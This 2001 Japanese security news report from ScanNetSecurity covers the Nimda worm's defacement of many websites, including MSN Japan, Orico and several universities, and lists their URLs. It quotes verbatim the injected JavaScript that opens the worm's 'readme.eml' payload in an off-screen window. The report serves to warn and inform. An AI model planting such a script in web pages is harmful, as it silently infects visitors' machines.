msn、オリコをはじめとする多数のwebが改竄、感染の踏み台にされる(2001.9.19)
Nimda によるweb改竄は、急激に広がっている。
現在、編集部で確認したwebページは下記であるが、いくつかのサイトでは、トップページ以下複数のページが改竄されるなどの広がりをみせている。大手サイト、企業も感染しており、企業名やサイト名で安心してアクセスす
インシデント・事故
インシデント・情報漏えい
現在、編集部で確認したwebページは下記であるが、いくつかのサイトでは、トップページ以下複数のページが改竄されるなどの広がりをみせている。大手サイト、企業も感染しており、企業名やサイト名で安心してアクセスすると、被害を受けることになる。インターネット利用にあたっては、パッチをあてる、スクリプトをオフにするなどの自己防衛が不可欠となっている。
改竄されたページには、下記のスクリプトが埋め込まれている。
「<html><script language="JavaScript">window.open("readme.eml",null, "resizable=no,top=6000,left=6000")</script></html>」
感染したwebは、拡大しており、下記にあげるものは、ごく一部でしかない。
改竄され、踏み台となったweb
・msnトップページ
http://www.msn.co.jp/
・オリコ
http://www.orico.co.jp/
・オリコ
http://www.orico.co.jp/senden/cm/e1.html
・山梨学院大学
http://www.ygu.ac.jp/
・山梨学院大学法学部
http://www.ygu.ac.jp/guide/hougakuseiji/index.html
・建設物価メディア株式会社
http://www.kensetu-bukka-m.co.jp/
・建設物価メディア株式会社
http://www.kensetu-bukka-m.co.jp/rireki/0109_edit_3.htm
・株式会社マウント富士インターネット
http://www.mfi.or.jp/www/
・都留信用組合
http://www.mfi.or.jp/w3/home0/tsurusin/
・RESORTHOTEL CAMELOT
http://www.mfi.or.jp/camelot/main.htm
・株式会社ストローカー ジャパン
http://www.mfi.or.jp/sjc/
・日本囲碁ソフト
布石・定石パワー アップデートモジュールのダウンロード
http://www.igosoft.co.jp/html/update/jpow2up.html
・囲碁ソフト 次の一手
http://www.igosoft.co.jp/html/UteruNyu/keisan.htm
・株式会社エルミックシステム
http://www.elmic.co.jp/japanese/index.html
・株式会社タイリクトラベル
http://www.tairiku.co.jp/hotel/
・株式会社タイリクトラベル TE ANAU テアナウ ホテル料金一覧
http://www.tairiku.co.jp/hotel/oceania/TEU_trf_A.html
・JTB GLOBAL ASSISTANCE
http://www.jga.co.jp/Indexright.htm
・マックスバリュ東北株式会社
http://www.mv-tohoku.co.jp/
・株式会社 日東物産
http://www.prland.co.jp/
・株式会社 日本ユニオンシステム
http://www.unionsys.co.jp/
・代官山美容外科
http://www.mpint.co.jp/~dky/congress_J.htm
・RSoundLibrary
http://www.crypton.co.jp/Web98/html/10380.html
・東京工業大学 井口家成 研究室HP内の個人ページ
http://www.htsc.ap.titech.ac.jp/member/kawai/test.htm
・志學館学園
http://www.jkajyo.ac.jp/
・志學館学園
http://www.jkajyo.ac.jp/sgn/camp/13kimo.html
・キャリアプラザ名古屋支店
http://www.hito-plaza.com/MM/news010914.htm
・早稲田大学 嘉納研究室
http://www.kano.arch.waseda.ac.jp/
《ScanNetSecurity》